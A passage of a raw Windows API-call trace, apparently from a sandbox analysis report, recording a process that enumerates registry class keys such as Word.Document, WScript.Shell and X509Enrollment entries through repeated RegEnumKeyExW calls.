lpName="WMSClientNetManager.ClientNetManager.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x116f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMSDKHTTPSourcePlugin.HTTPSource", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1170, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMSDKHTTPSourcePlugin.HTTPSource.2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1171, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMSDKMSBSourcePlugin.MSBDSource", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1172, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMSDKMSBSourcePlugin.MSBDSource.2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1173, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMSDKNamespace.NamespaceFactory", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1174, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMSDKNamespace.NamespaceFactory.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1175, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMVFile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1176, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Addin.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1177, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Application", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1178, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Application.16", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1179, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Application.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x117a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Backup.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x117b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Basic", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x117c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Basic.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x117d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Basic.9", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x117e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Document", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x117f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Document.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1180, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Document.6", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1181, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Document.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1182, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.DocumentMacroEnabled", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1183, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.DocumentMacroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1184, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.OpenDocumentText", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1185, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.OpenDocumentText.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1186, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Picture", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1187, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Picture.6", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1188, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Picture.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.608] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1189, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.RTF.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x118a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Template", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x118b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Template.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x118c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Template.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x118d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.TemplateMacroEnabled", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x118e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.TemplateMacroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x118f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.UriLink.16", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1190, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word.Wizard.8", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1191, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WordDocument", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1192, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wordhtmlfile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1193, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wordhtmltemplate", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1194, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wordmhtmlfile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1195, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wordpad.Document.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1196, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wordxmlfile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1197, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WorkingTime.WorkingTime", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1198, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Workspace.Installer", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1199, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Workspace.Installer.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x119a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Workspace.PolicyProcessor", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x119b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Workspace.PolicyProcessor.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x119c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Workspace.ResTypeRegistry", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.609] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x119d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Workspace.ResTypeRegistry.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x119e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WorkspaceBroker.WorkspaceBroker", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x119f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WorkspaceBroker.WorkspaceBroker.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WorkspaceBrokerAx.WorkspaceBrokerAx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WorkspaceBrokerAx.WorkspaceBrokerAx.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WorkspaceRuntime.Workspace", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WorkspaceRuntime.Workspace.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WOW6432Node", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WPDContextMenu.Url", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WPDSp.WPDServiceProvider", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WPDSp.WPDServiceProvider.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wscAPI.WSCDefaultProduct", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11a9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wscAPI.WSCDefaultProduct.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11aa, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wscAPI.WSCProductList", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ab, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wscAPI.WSCProductList.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ac, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WScript.Network", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ad, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WScript.Network.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ae, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WScript.Shell", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11af, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WScript.Shell.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.610] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WSFFile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WSHController", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WSHFile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WSMan.Automation", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WSMan.Automation.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WSMan.InternalAutomation", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WSMan.InternalAutomation.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="x-internet-signup", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CAlternativeName", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11b9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CAlternativeName.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11ba, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CAlternativeNames", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11bb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CAlternativeNames.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11bc, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CBinaryConverter", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11bd, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CBinaryConverter.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11be, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="X509Enrollment.CCertificateAttestationChallenge", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.611] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11bf, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, 